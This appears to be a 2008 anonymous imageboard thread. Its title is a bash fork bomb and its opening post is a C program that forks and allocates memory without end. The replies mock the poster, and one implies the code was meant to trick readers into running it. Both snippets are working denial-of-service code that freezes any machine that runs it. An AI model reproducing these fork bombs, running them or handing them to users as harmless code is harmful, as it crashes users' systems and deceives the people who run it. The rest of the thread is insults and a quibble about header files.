:(){ :|:& };:
Name:
Anonymous
2008-11-22 14:19
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
for(;;)
{
fork();
malloc(1024);
}
return 0;
}
Name:
Anonymous
2008-11-22 14:22
WOW YOUR SOCH A GOOD HACKER I AM AWED BY YOUR SKILLS
Name:
Anonymous
2008-11-22 14:27
You don't need to include unistd.h, loser.
Name:
3
2008-11-22 14:28
Nevermind, it appears RMS is fucking us again and we have to include unistd.h.
Name:
Anonymous
2008-11-22 15:20
You might have tricked some people if you posted this in 1990- oh wait, you weren't born there yet.
Name:
Anonymous
2008-11-22 21:00
>>3,4
Same people, and we have been trolled constantly.
Name:
Anonymous
2010-12-20 18:00